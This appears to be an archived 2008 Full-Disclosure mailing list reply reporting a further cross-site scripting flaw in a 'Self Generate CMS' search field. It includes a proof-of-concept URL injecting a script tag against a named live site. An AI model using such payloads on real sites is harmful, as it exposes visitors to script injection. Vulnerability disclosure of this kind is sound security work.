Guardian Digital WebTool

full-disclosure-uk August 2008 archive

Main Archive Page > Month Archives > full-disclosure-uk archives

full-disclosure-uk: Re: [Full-disclosure] Multiple XSS Vulnerabi

Re: [Full-disclosure] Multiple XSS Vulnerabilities in Self Generate CMS (K?rast)

From: <devildeath1988_at_nospam>
Date: Sun Aug 24 2008 - 23:46:12 GMT
To: full-disclosure@lists.grok.org.uk

Hi.
I Have found one more vulnerable value which is not cleaned before it would be displayed. When you search, there would be a POST value 'search=injection'. It's like the page value.

See here:
http://www.ubuonline.co.uk/index.php?search=here%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E&go.x=0&go.y=%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E&go=Search

devildeath

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

This message: [ Message body ]
Next message: PÄ±nar YanardaÄŸ: "[Full-disclosure] [PLSA 2008-28] Libxml2: Denial of Service"
Previous message: Rodrigo Rubira Branco (BSDaemon): "[Full-disclosure] Call For Papers - Hackers 2 Hackers Conference 5th Edition - Brazil"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]

© Copyright 2012 Guardian Digital, Inc. All Rights Reserved.